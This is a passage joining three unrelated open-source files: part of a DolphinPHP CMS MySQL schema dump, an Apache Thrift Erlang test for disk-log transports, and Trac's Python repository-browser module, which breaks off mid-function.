INSERT INTO `dp_cms_menu` VALUES ('6', '1', '5', '0', '0', '2', '子菜单', 'http://www.dolphinphp.com', '', '', '_self', '1492347388', '1492347520', '100', '1');
-- -----------------------------
-- 表结构 `dp_cms_model`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_model`;
CREATE TABLE `dp_cms_model` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(32) NOT NULL DEFAULT '' COMMENT '模型名称',
`title` varchar(32) NOT NULL DEFAULT '' COMMENT '模型标题',
`table` varchar(64) NOT NULL DEFAULT '' COMMENT '附加表名称',
`type` tinyint(2) NOT NULL DEFAULT '1' COMMENT '模型类别:0-系统模型,1-普通模型,2-独立模型',
`icon` varchar(64) NOT NULL,
`sort` int(11) NOT NULL DEFAULT '100' COMMENT '排序',
`system` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '是否系统模型',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='内容模型表';
-- -----------------------------
-- 表结构 `dp_cms_nav`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_nav`;
CREATE TABLE `dp_cms_nav` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`tag` varchar(32) NOT NULL DEFAULT '' COMMENT '导航标识',
`title` varchar(32) NOT NULL DEFAULT '' COMMENT '菜单标题',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='导航表';
-- -----------------------------
-- 表数据 `dp_cms_nav`
-- -----------------------------
INSERT INTO `dp_cms_nav` VALUES ('1', 'main_nav', '顶部导航', '1492345083', '1492345083', '1');
INSERT INTO `dp_cms_nav` VALUES ('2', 'about_nav', '底部关于', '1492346685', '1492346685', '1');
INSERT INTO `dp_cms_nav` VALUES ('3', 'support_nav', '服务与支持', '1492346715', '1492346715', '1');
-- -----------------------------
-- 表结构 `dp_cms_page`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_page`;
CREATE TABLE `dp_cms_page` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(64) NOT NULL DEFAULT '' COMMENT '单页标题',
`content` mediumtext NOT NULL COMMENT '单页内容',
`keywords` varchar(32) NOT NULL DEFAULT '' COMMENT '关键词',
`description` varchar(250) NOT NULL DEFAULT '' COMMENT '页面描述',
`template` varchar(32) NOT NULL DEFAULT '' COMMENT '模板文件',
`cover` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '单页封面',
`view` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '阅读量',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='单页表';
-- -----------------------------
-- 表数据 `dp_cms_page`
-- -----------------------------
-- -----------------------------
-- 表结构 `dp_cms_slider`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_slider`;
CREATE TABLE `dp_cms_slider` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(32) NOT NULL DEFAULT '' COMMENT '标题',
`cover` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '封面id',
`url` varchar(255) NOT NULL DEFAULT '' COMMENT '链接地址',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`sort` int(11) unsigned NOT NULL DEFAULT '100' COMMENT '排序',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='滚动图片表';
-- -----------------------------
-- 表数据 `dp_cms_slider`
-- -----------------------------
-- -----------------------------
-- 表结构 `dp_cms_support`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_support`;
CREATE TABLE `dp_cms_support` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(128) NOT NULL DEFAULT '' COMMENT '客服名称',
`qq` varchar(16) NOT NULL DEFAULT '' COMMENT 'QQ',
`msn` varchar(100) NOT NULL DEFAULT '' COMMENT 'msn',
`taobao` varchar(100) NOT NULL DEFAULT '' COMMENT 'taobao',
`alibaba` varchar(100) NOT NULL DEFAULT '' COMMENT 'alibaba',
`skype` varchar(100) NOT NULL DEFAULT '' COMMENT 'skype',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
`sort` int(11) unsigned NOT NULL DEFAULT '100' COMMENT '排序',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='客服表';
-- -----------------------------
-- 表数据 `dp_cms_support`
-- -----------------------------
| {
"pile_set_name": "Github"
} |
%%
%% Licensed to the Apache Software Foundation (ASF) under one
%% or more contributor license agreements. See the NOTICE file
%% distributed with this work for additional information
%% regarding copyright ownership. The ASF licenses this file
%% to you under the Apache License, Version 2.0 (the
%% "License"); you may not use this file except in compliance
%% with the License. You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
-module(test_disklog).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
disklog_test() ->
{ok, TransportFactory} =
thrift_disk_log_transport:new_transport_factory(
test_disklog,
[{file, "./test_log"},
{size, {1024*1024, 10}}]),
{ok, ProtocolFactory} =
thrift_binary_protocol:new_protocol_factory( TransportFactory, []),
{ok, Proto} = ProtocolFactory(),
{ok, Client0} = thrift_client:new(Proto, thrift_test_thrift),
io:format("Client started~n"),
% We have to make oneway calls into this client only since otherwise it
% will try to read from the disklog and go boom.
{Client1, {ok, ok}} = thrift_client:call(Client0, testOneway, [16#deadbeef]),
io:format("Call written~n"),
% Use the send_call method to write a non-oneway call into the log
{Client2, ok} =
thrift_client:send_call(Client1, testString, [<<"hello world">>]),
io:format("Non-oneway call sent~n"),
{_Client3, ok} = thrift_client:close(Client2),
io:format("Client closed~n"),
lists:foreach(fun(File) -> file:delete(File) end, [
"./test_log.1",
"./test_log.idx",
"./test_log.siz"
]),
io:format("Cleaning up test files~n"),
ok.
disklog_base64_test() ->
{ok, TransportFactory} =
thrift_disk_log_transport:new_transport_factory(
test_disklog,
[{file, "./test_b64_log"},
{size, {1024*1024, 10}}]),
{ok, B64Factory} =
thrift_base64_transport:new_transport_factory(TransportFactory),
{ok, BufFactory} =
thrift_buffered_transport:new_transport_factory(B64Factory),
{ok, ProtocolFactory} =
thrift_binary_protocol:new_protocol_factory(BufFactory, []),
{ok, Proto} = ProtocolFactory(),
{ok, Client0} = thrift_client:new(Proto, thrift_test_thrift),
io:format("Client started~n"),
% We have to make oneway calls into this client only since otherwise
% it will try to read from the disklog and go boom.
{Client1, {ok, ok}} = thrift_client:call(Client0, testOneway, [16#deadbeef]),
io:format("Call written~n"),
% Use the send_call method to write a non-oneway call into the log
{Client2, ok} =
thrift_client:send_call(Client1, testString, [<<"hello world">>]),
io:format("Non-oneway call sent~n"),
{_Client3, ok} = thrift_client:close(Client2),
io:format("Client closed~n"),
lists:foreach(fun(File) -> file:delete(File) end, [
"./test_b64_log.1",
"./test_b64_log.idx",
"./test_b64_log.siz"
]),
io:format("Cleaning up test files~n"),
ok.
-endif.
| {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2003-2020 Edgewall Software
# Copyright (C) 2003-2005 Jonas Borgström <[email protected]>
# Copyright (C) 2005-2007 Christian Boos <[email protected]>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at https://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at https://trac.edgewall.org/log/.
#
# Author: Jonas Borgström <[email protected]>
import re
from datetime import datetime, timedelta
from fnmatch import fnmatchcase
from trac.config import BoolOption, ListOption, Option
from trac.core import *
from trac.mimeview.api import IHTMLPreviewAnnotator, Mimeview, is_binary
from trac.perm import IPermissionRequestor, PermissionError
from trac.resource import Resource, ResourceNotFound
from trac.util import as_bool, embedded_numbers
from trac.util.datefmt import datetime_now, http_date, to_datetime, utc
from trac.util.html import Markup, escape, tag
from trac.util.text import exception_to_unicode, shorten_line
from trac.util.translation import _, cleandoc_
from trac.versioncontrol.api import NoSuchChangeset, RepositoryManager
from trac.versioncontrol.web_ui.util import *
from trac.web.api import IRequestHandler, RequestDone
from trac.web.chrome import (Chrome, INavigationContributor, add_ctxtnav,
add_link, add_script, add_stylesheet,
prevnext_nav, web_context)
from trac.wiki.api import IWikiMacroProvider, IWikiSyntaxProvider, parse_args
from trac.wiki.formatter import format_to_html, format_to_oneliner
CHUNK_SIZE = 4096
class IPropertyRenderer(Interface):
"""Render node properties in TracBrowser and TracChangeset views."""
def match_property(name, mode):
"""Indicate whether this renderer can treat the given property
`mode` is the current rendering context, which can be:
- 'browser' rendered in the browser view
- 'changeset' rendered in the changeset view as a node property
- 'revprop' rendered in the changeset view as a revision property
Other identifiers might be used by plugins, so it's advised to simply
ignore unknown modes.
Returns a quality number, ranging from 0 (unsupported) to 9
(''perfect'' match).
"""
def render_property(name, mode, context, props):
"""Render the given property.
`name` is the property name as given to `match()`,
`mode` is the same as for `match_property`,
`context` is the context for the node being render
(useful when the rendering depends on the node kind) and
`props` is the collection of the corresponding properties
(i.e. the `node.get_properties()`).
The rendered result can be one of the following:
- `None`: the property will be skipped
- an `unicode` value: the property will be displayed as text
- a `RenderedProperty` instance: the property will only be displayed
using the instance's `content` attribute, and the other attributes
will also be used in some display contexts (like `revprop`)
- `Markup` or `Fragment`: the property will be displayed
normally, using that content as a block-level markup
"""
class RenderedProperty(object):
def __init__(self, name=None, name_attributes=None,
content=None, content_attributes=None):
self.name = name
self.name_attributes = name_attributes
self.content = content
self.content_attributes = content_attributes
class DefaultPropertyRenderer(Component):
"""Default version control property renderer."""
implements(IPropertyRenderer)
def match_property(self, name, mode):
return 1
def render_property(self, name, mode, context, props):
# No special treatment besides respecting newlines in values.
value = props[name]
if value and '\n' in value:
value = Markup(''.join('<br />%s' % escape(v)
for v in value.split('\n')))
return value
class WikiPropertyRenderer(Component):
"""Wiki text property renderer."""
implements(IPropertyRenderer)
wiki_properties = ListOption('browser', 'wiki_properties',
'trac:description',
doc="""Comma-separated list of version control properties to render
as wiki content in the repository browser.
""")
oneliner_properties = ListOption('browser', 'oneliner_properties',
'trac:summary',
doc="""Comma-separated list of version control properties to render
as oneliner wiki content in the repository browser.
""")
def match_property(self, name, mode):
return 4 if name in self.wiki_properties \
or name in self.oneliner_properties else 0
def render_property(self, name, mode, context, props):
if name in self.wiki_properties:
return format_to_html(self.env, context, props[name])
else:
return format_to_oneliner(self.env, context, props[name])
class TimeRange(object):
min = datetime(1, 1, 1, 0, 0, 0, 0, utc) # tz aware version of datetime.min
def __init__(self, base):
self.oldest = self.newest = base
self._total = None
def seconds_between(self, dt1, dt2):
delta = dt1 - dt2
return delta.days * 24 * 3600 + delta.seconds
def to_seconds(self, dt):
return self.seconds_between(dt, TimeRange.min)
def from_seconds(self, secs):
return TimeRange.min + timedelta(*divmod(secs, 24* 3600))
def relative(self, datetime):
if self._total is None:
self._total = float(self.seconds_between(self.newest, self.oldest))
age = 1.0
if self._total:
age = self.seconds_between(datetime, self.oldest) / self._total
return age
def insert(self, datetime):
self._total = None
self.oldest = min(self.oldest, datetime)
self.newest = max(self.newest, datetime)
class BrowserModule(Component):
implements(INavigationContributor, IPermissionRequestor, IRequestHandler,
IWikiSyntaxProvider, IHTMLPreviewAnnotator,
IWikiMacroProvider)
property_renderers = ExtensionPoint(IPropertyRenderer)
realm = RepositoryManager.source_realm
downloadable_paths = ListOption('browser', 'downloadable_paths',
'/trunk, /branches/*, /tags/*',
doc="""List of repository paths that can be downloaded.
Leave this option empty if you want to disable all downloads, otherwise
set it to a comma-separated list of authorized paths (those paths are
glob patterns, i.e. "*" can be used as a wild card). In a
multi-repository environment, the path must be qualified with the
repository name if the path does not point to the default repository
(e.g. /reponame/trunk). Note that a simple prefix matching is
performed on the paths, so aliases won't get automatically resolved.
""")
color_scale = BoolOption('browser', 'color_scale', True,
doc="""Enable colorization of the ''age'' column.
This uses the same color scale as the source code annotation:
blue is older, red is newer.
""")
NEWEST_COLOR = (255, 136, 136)
newest_color = Option('browser', 'newest_color', repr(NEWEST_COLOR),
doc="""(r,g,b) color triple to use for the color corresponding
to the newest color, for the color scale used in ''blame'' or
the browser ''age'' column if `color_scale` is enabled.
""")
OLDEST_COLOR = (136, 136, 255)
oldest_color = Option('browser', 'oldest_color', repr(OLDEST_COLOR),
doc="""(r,g,b) color triple to use for the color corresponding
to the oldest color, for the color scale used in ''blame'' or
the browser ''age'' column if `color_scale` is enabled.
""")
intermediate_point = Option('browser', 'intermediate_point', '',
doc="""If set to a value between 0 and 1 (exclusive), this will be the
point chosen to set the `intermediate_color` for interpolating
the color value.
""")
intermediate_color = Option('browser', 'intermediate_color', '',
doc="""(r,g,b) color triple to use for the color corresponding
to the intermediate color, if two linear interpolations are used
for the color scale (see `intermediate_point`).
If not set, the intermediate color between `oldest_color` and
`newest_color` will be used.
""")
render_unsafe_content = BoolOption('browser', 'render_unsafe_content',
'false',
"""Whether raw files should be rendered in the browser, or only made
downloadable.
Pretty much any file may be interpreted as HTML by the browser,
which allows a malicious user to create a file containing cross-site
scripting attacks.
For open repositories where anyone can check-in a file, it is
recommended to leave this option disabled.""")
hidden_properties = ListOption('browser', 'hide_properties', 'svk:merge',
doc="""Comma-separated list of version control properties to hide from
the repository browser.
""")
# public methods
def get_custom_colorizer(self):
"""Returns a converter for values from [0.0, 1.0] to a RGB triple."""
def interpolate(old, new, value):
# Provides a linearly interpolated color triple for `value`
# which must be a floating point value between 0.0 and 1.0
return tuple([int(b + (a - b) * value) for a, b in zip(new, old)])
def parse_color(rgb, default):
# Get three ints out of a `rgb` string or return `default`
try:
t = tuple([int(v) for v in re.split(r'(\d+)', rgb)[1::2]])
return t if len(t) == 3 else default
except ValueError:
return default
newest_color = parse_color(self.newest_color, self.NEWEST_COLOR)
oldest_color = parse_color(self.oldest_color, self.OLDEST_COLOR)
try:
intermediate = float(self.intermediate_point)
except ValueError:
intermediate = None
if intermediate:
intermediate_color = parse_color(self.intermediate_color, None)
if not intermediate_color:
intermediate_color = tuple([(a + b) / 2 for a, b in
zip(newest_color, oldest_color)])
def colorizer(value):
if value <= intermediate:
value = value / intermediate
return interpolate(oldest_color, intermediate_color, value)
else:
value = (value - intermediate) / (1.0 - intermediate)
return interpolate(intermediate_color, newest_color, value)
else:
def colorizer(value):
return interpolate(oldest_color, newest_color, value)
return colorizer
# INavigationContributor methods
def get_active_navigation_item(self, req):
return 'browser'
def get_navigation_items(self, req):
rm = RepositoryManager(self.env)
if any(repos.is_viewable(req.perm) for repos
in rm.get_real_repositories()):
yield ('mainnav', 'browser',
tag.a(_('Browse Source'), href=req.href.browser()))
# IPermissionRequestor methods
def get_permission_actions(self):
return ['BROWSER_VIEW', 'FILE_VIEW']
# IRequestHandler methods
def match_request(self, req):
match = re.match(r'/(export|browser|file)(/.*)?$', req.path_info)
if match:
mode, path = match.groups()
if mode == 'export':
if path and '/' in path:
path_elts = path.split('/', 2)
if len(path_elts) != 3:
return False
path = path_elts[2]
req.args['rev'] = path_elts[1]
req.args['format'] = 'raw'
elif mode == 'file':
req.redirect(req.href.browser(path, rev=req.args.get('rev'),
format=req.args.get('format')),
permanent=True)
req.args['path'] = path or '/'
return True
def process_request(self, req):
presel = req.args.get('preselected')
if presel and (presel + '/').startswith(req.href.browser() + '/'):
req.redirect(presel)
path = req.args.get('path', '/')
rev = req.args.get('rev', '')
if rev.lower() in ('', 'head'):
rev = None
format = req.args.get('format')
order = req.args.get('order', 'name').lower()
desc = 'desc' in req.args
rm = RepositoryManager(self.env)
all_repositories = rm.get_all_repositories()
reponame, repos, path = rm.get_repository_by_path(path)
# Repository index
show_index = not reponame and path == '/'
if show_index:
if repos and (as_bool(all_repositories[''].get('hidden'))
or not repos.is_viewable(req.perm)):
repos = None
if not repos and reponame:
raise ResourceNotFound(_("Repository '%(repo)s' not found",
repo=reponame))
if reponame and reponame != repos.reponame: # Redirect alias
qs = req.query_string
req.redirect(req.href.browser(repos.reponame or None, path)
+ ('?' + qs if qs else ''))
reponame = repos.reponame if repos else None
# Find node for the requested path/rev
context = web_context(req)
node = None
changeset = None
display_rev = lambda rev: rev
if repos:
try:
if rev:
rev = repos.normalize_rev(rev)
# If `rev` is `None`, we'll try to reuse `None` consistently,
# as a special shortcut to the latest revision.
rev_or_latest = rev or repos.youngest_rev
node = get_existing_node(req, repos, path, rev_or_latest)
except NoSuchChangeset as e:
raise ResourceNotFound(e, _('Invalid changeset number'))
if node:
try:
# use changeset instance to retrieve branches and tags
changeset = repos.get_changeset(node.rev)
except NoSuchChangeset:
pass
context = context.child(repos.resource.child(self.realm, path,
version=rev_or_latest))
display_rev = repos.display_rev
# Prepare template data
path_links = get_path_links(req.href, reponame, path, rev,
order, desc)
repo_data = dir_data = file_data = None
if show_index:
repo_data = self._render_repository_index(
context, all_repositories, order, desc)
if node:
if not node.is_viewable(req.perm):
raise PermissionError('BROWSER_VIEW' if node.isdir else
'FILE_VIEW', node.resource, self.env)
if node.isdir:
if format in ('zip',): # extension point here...
self._render_zip(req, context, repos, node, rev)
# not reached
dir_data = self._render_dir(req, repos, node, rev, order, desc)
elif node.isfile:
file_data = self._render_file(req, context, repos, node, rev)
if not repos and not (repo_data and repo_data['repositories']):
# If no viewable repositories, check permission instead of
# repos.is_viewable()
req.perm.require('BROWSER_VIEW')
if show_index:
raise ResourceNotFound(_("No viewable repositories"))
else:
raise ResourceNotFound(_("No node %(path)s", path=path))
quickjump_data = properties_data = None
if node and not req.is_xhr:
properties_data = self.render_properties(
'browser', context, node.get_properties())
quickjump_data = list(repos.get_quickjump_entries(rev))
data = {
'context': context, 'reponame': reponame, 'repos': repos,
'repoinfo': all_repositories.get(reponame or ''),
'path': path, 'rev': node and node.rev, 'stickyrev': rev,
'display_rev': display_rev, 'changeset': changeset,
'created_path': node and node.created_path,
'created_rev': node and node.created_rev,
'properties': properties_data,
'path_links': path_links,
'order': order, 'desc': 1 if desc else None,
'repo': repo_data, 'dir': dir_data, 'file': file_data,
'quickjump_entries': quickjump_data,
'wiki_format_messages':
self.config['changeset'].getbool('wiki_format_messages'),
}
if req.is_xhr: # render and return the content only
return 'dir_entries.html', data
if dir_data or repo_data:
add_script(req, 'common/js/expand_dir.js')
add_script(req, 'common/js/keyboard_nav.js')
# Links for contextual navigation
if node:
if node.isfile:
prev_rev = repos.previous_rev(rev=node.created_rev,
path=node.created_path)
if prev_rev:
href = req.href.browser(reponame,
node.created_path, rev=prev_rev)
add_link(req, 'prev', href,
_('Revision %(num)s', num=display_rev(prev_rev)))
if rev is not None:
add_link(req, 'up', req.href.browser(reponame,
node.created_path))
next_rev = repos.next_rev(rev=node.created_rev,
path=node.created_path)
if next_rev:
href = req.href.browser(reponame, node.created_path,
rev=next_rev)
add_link(req, 'next', href,
_('Revision %(num)s', num=display_rev(next_rev)))
prevnext_nav(req, _('Previous Revision'), _('Next Revision'),
_('Latest Revision'))
else:
if path != '/':
add_link(req, 'up', path_links[-2]['href'],
_('Parent directory'))
add_ctxtnav(req, tag.a(_('Last Change'),
href=req.href.changeset(node.created_rev, reponame,
node.created_path)))
if node.isfile:
annotate = data['file']['annotate']
if annotate:
add_ctxtnav(req, _('Normal'),
title=_('View file without annotations'),
href=req.href.browser(reponame,
node.created_path,
rev=rev))
if annotate != 'blame':
add_ctxtnav(req, _('Blame'),
title=_('Annotate each line with the last '
'changed revision '
'(this can be time consuming...)'),
href=req.href.browser(reponame,
node.created_path,
rev=rev,
annotate='blame'))
add_ctxtnav(req, _('Revision Log'),
href=req.href.log(reponame, path, rev=rev))
path_url = repos.get_path_url(path, rev)
if path_url:
if path_url.startswith('//'):
path_url = req.scheme + ':' + path_url
add_ctxtnav(req, _('Repository URL'), href=path_url)
add_stylesheet(req, 'common/css/browser.css')
return 'browser.html', data
# Internal methods
def _render_repository_index(self, context, all_repositories, order, desc):
# Color scale for the age column
timerange = custom_colorizer = None
if self.color_scale:
custom_colorizer = self.get_custom_colorizer()
rm = RepositoryManager(self.env)
repositories = []
for reponame, repoinfo in all_repositories.iteritems():
if not reponame or as_bool(repoinfo.get('hidden')):
continue
try:
repos = rm.get_repository(reponame)
except TracError as err:
entry = (reponame, repoinfo, None, None,
exception_to_unicode(err), None)
else:
if repos:
if not repos.is_viewable(context.perm):
continue
try:
youngest = repos.get_changeset(repos.youngest_rev)
except NoSuchChangeset:
youngest = None
if self.color_scale and youngest:
if not timerange:
timerange = TimeRange(youngest.date)
else:
timerange.insert(youngest.date)
raw_href = self._get_download_href(context.href, repos,
None, None)
entry = (reponame, repoinfo, repos, youngest, None,
raw_href)
else:
entry = (reponame, repoinfo, None, None, u"\u2013", None)
if entry[4] is not None: # Check permission in case of error
root = Resource('repository', reponame).child(self.realm, '/')
if 'BROWSER_VIEW' not in context.perm(root):
continue
repositories.append(entry)
# Ordering of repositories
if order == 'date':
def repo_order(args):
reponame, repoinfo, repos, youngest, err, href = args
return (youngest.date if youngest else to_datetime(0),
embedded_numbers(reponame.lower()))
elif order == 'author':
def repo_order(args):
reponame, repoinfo, repos, youngest, err, href = args
return (youngest.author.lower() if youngest else '',
embedded_numbers(reponame.lower()))
else:
def repo_order(args):
reponame, repoinfo, repos, youngest, err, href = args
return embedded_numbers(reponame.lower())
repositories = sorted(repositories, key=repo_order, reverse=desc)
return {'repositories' : repositories,
'timerange': timerange, 'colorize_age': custom_colorizer}
def _render_dir(self, req, repos, node, rev, order, desc):
req.perm(node.resource).require('BROWSER_VIEW')
download_href = self._get_download_href
# Entries metadata
class entry(object):
_copy = 'name rev created_rev kind isdir path content_length' \
.split()
__slots__ = _copy + ['raw_href']
def __init__(self, node):
for f in entry._copy:
setattr(self, f, getattr(node, f))
self.raw_href = download_href(req.href, repos, node, rev)
entries = [entry(n) for n in node.get_entries()
if n.is_viewable(req.perm)]
changes = get_changes(repos, [i.created_rev for i in entries],
self.log)
if rev:
newest = repos.get_changeset(rev).date
else:
newest = datetime_now(req.tz)
# Color scale for the age column
timerange = custom_colorizer = None
if self.color_scale:
timerange = TimeRange(newest)
max_s = req.args.get('range_max_secs')
min_s = req.args.get('range_min_secs')
parent_range = [timerange.from_seconds(int(s))
for s in [max_s, min_s] if s]
this_range = [c.date for c in changes.values() if c]
for dt in this_range + parent_range:
timerange.insert(dt)
custom_colorizer = self.get_custom_colorizer()
# Ordering of entries
if order == 'date':
def file_order(a):
return (changes[a.created_rev].date,
embedded_numbers(a.name.lower()))
elif order == 'size':
def file_order(a):
return (a.content_length,
embedded_numbers(a.name.lower()))
elif order == 'author':
def file_order(a):
return (changes[a.created_rev].author.lower(),
embedded_numbers(a.name.lower()))
else:
def file_order(a):
return embedded_numbers(a.name.lower())
dir_order = 1 if desc else -1
def browse_order(a):
return dir_order if a.isdir else 0, file_order(a)
entries = sorted(entries, key=browse_order, reverse=desc)
# ''Zip Archive'' alternate link
zip_href = self._get_download_href(req.href, repos, node, rev)
if zip_href:
add_link(req, 'alternate', zip_href, _('Zip Archive'),
'application/zip', 'zip')
return {'entries': entries, 'changes': changes,
'timerange': timerange, 'colorize_age': custom_colorizer,
'range_max_secs': (timerange and
timerange.to_seconds(timerange.newest)),
'range_min_secs': (timerange and
timerange.to_seconds(timerange.oldest)),
}
def _iter_nodes(self, node):
stack = [node]
while stack:
node = stack.pop()
yield node
if node.isdir:
stack.extend(sorted(node.get_entries(),
key=lambda x: x.name,
reverse=True))
def _render_zip(self, req, context, repos, root_node, rev=None):
if not self.is_path_downloadable(repos, root_node.path):
raise TracError(_("Path not available for download"))
req.perm(context.resource).require('FILE_VIEW')
root_path = root_node.path.rstrip('/')
if root_path:
archive_name = root_node.name
else:
archive_name = repos.reponame or 'repository'
filename = '%s-%s.zip' % (archive_name, root_node.rev)
render_zip(req, filename, repos, root_node, self._iter_nodes)
def _render_file(self, req, context, repos, node, rev=None):
req.perm(node.resource).require('FILE_VIEW')
mimeview = Mimeview(self.env)
# MIME type detection
with content_closing(node.get_processed_content()) as content:
chunk = content.read(CHUNK_SIZE)
mime_type = node.content_type
if not mime_type or mime_type == 'application/octet-stream':
mime_type = mimeview.get_mimetype(node.name, chunk) or \
mime_type or 'text/plain'
# Eventually send the file directly
format = req.args.get('format')
if format in ('raw', 'txt'):
req.send_response(200)
req.send_header('Content-Type',
'text/plain' if format == 'txt' else mime_type)
req.send_header('Last-Modified', http_date(node.last_modified))
if rev is None:
req.send_header('Pragma', 'no-cache')
req.send_header('Cache-Control', 'no-cache')
req.send_header('Expires', 'Fri, 01 Jan 1999 00:00:00 GMT')
if not self.render_unsafe_content:
# Force browser to download files instead of rendering
# them, since they might contain malicious code enabling
# XSS attacks
req.send_header('Content-Disposition', 'attachment')
req.end_headers()
# Note: don't pass an iterable instance to RequestDone, instead
# call req.write() with each chunk here to avoid SEGVs (#11805)
while chunk:
req.write(chunk)
chunk = content.read(CHUNK_SIZE)
raise RequestDone
# The changeset corresponding to the last change on `node`
# is more interesting than the `rev` changeset.
changeset = repos.get_changeset(node.created_rev)
# add ''Plain Text'' alternate link if needed
if not is_binary(chunk) and mime_type != 'text/plain':
plain_href = req.href.browser(repos.reponame or None,
node.path, rev=rev,
format='txt')
add_link(req, 'alternate', plain_href, _('Plain Text'),
'text/plain')
# add ''Original Format'' alternate link (always)
raw_href = req.href.export(rev or repos.youngest_rev,
repos.reponame or None, node.path)
add_link(req, 'alternate', raw_href, _('Original Format'),
mime_type)
self.log.debug("Rendering preview of node %s@%s with "
"mime-type %s", node.name, rev, mime_type)
add_stylesheet(req, 'common/css/code.css')
annotations = ['lineno']
annotate = req.args.get('annotate')
if annotate:
annotations.insert(0, annotate)
with content_closing(node.get_processed_content()) as content:
preview_data = mimeview.preview_data(context, content,
node.get_content_length(),
mime_type, node.created_path,
raw_href,
annotations=annotations,
force_source=bool(annotate))
return {
'changeset': changeset,
'size': node.content_length,
'preview': preview_data,
'annotate': annotate,
}
def _get_download_href(self, href, repos, node, rev):
"""Return the URL for downloading a file, or a directory as a ZIP."""
if node is not None and node.isfile:
return href.export(rev or 'HEAD', repos.reponame or None,
node.path)
path = '' if node is None else node.path.strip('/')
if self.is_path_downloadable(repos, path):
return href.browser(repos.reponame or None, path,
rev=rev or repos.youngest_rev, format='zip')
# public methods
def is_path_downloadable(self, repos, path):
if repos.reponame:
path = repos.reponame + '/' + path
return any(fnmatchcase(path, dp.strip('/'))
for dp in self.downloadable_paths)
def render_properties(self, mode, context, props):
"""Prepare rendering of a collection of properties."""
return filter(None, [self.render_property(name, mode, context, props)
for name in sorted(props)])
def render_property(self, name, mode, context, props):
"""Renders a node property to HTML."""
if name in self.hidden_properties:
return
candidates = []
for renderer in self.property_renderers:
quality = renderer.match_property(name, mode)
if quality > 0:
candidates.append((quality, renderer))
candidates.sort(reverse=True)
for (quality, renderer) in candidates:
try:
rendered = renderer.render_property(name, mode, context, props)
if not rendered:
return rendered
if isinstance(rendered, RenderedProperty):
value = rendered.content
else:
value = rendered
rendered = None
prop = {'name': name, 'value': value, 'rendered': rendered}
return prop
except Exception as e:
self.log.warning('Rendering failed for property %s with '
'renderer %s: %s', name,
renderer.__class__.__name__,
exception_to_unicode(e, traceback=True))
# IWikiSyntaxProvider methods
def get_wiki_syntax(self):
return []
def get_link_resolvers(self):
"""TracBrowser link resolvers.
`source:` and `browser:`
* simple paths (/dir/file)
* paths at a given revision (/dir/file@234)
* paths with line number marks (/dir/file@234:10,20-30)
* paths with line number anchor (/dir/file@234#L100)
Marks and anchor can be combined.
The revision must be present when specifying line numbers.
In the few cases where it would be redundant (e.g. for tags), the
revision number itself can be omitted: /tags/v10/file@100-110#L99
"""
return [('repos', self._format_browser_link),
('export', self._format_export_link),
('source', self._format_browser_link),
('browser', self._format_browser_link)]
def _format_export_link(self, formatter, ns, export, label):
export, query, fragment = formatter.split_link(export)
if ':' in export:
rev, path = export.split(':', 1)
elif '@' in export:
path, rev = export.split('@', 1)
else:
rev, path = None, export
node, raw_href, title = self._get_link_info(path, rev, formatter.href,
formatter.perm)
if raw_href:
return tag.a(label, class_='export', href=raw_href + fragment,
title=title)
return tag.a(label, class_='missing export')
def _format_browser_link(self, formatter, ns, path, label):
path, query, fragment = formatter.split_link(path)
rev = marks = None
match = self.PATH_LINK_RE.match(path)
if match:
path, rev, marks = match.groups()
href = formatter.href
src_href = href.browser(path, rev=rev, marks=marks) + query + fragment
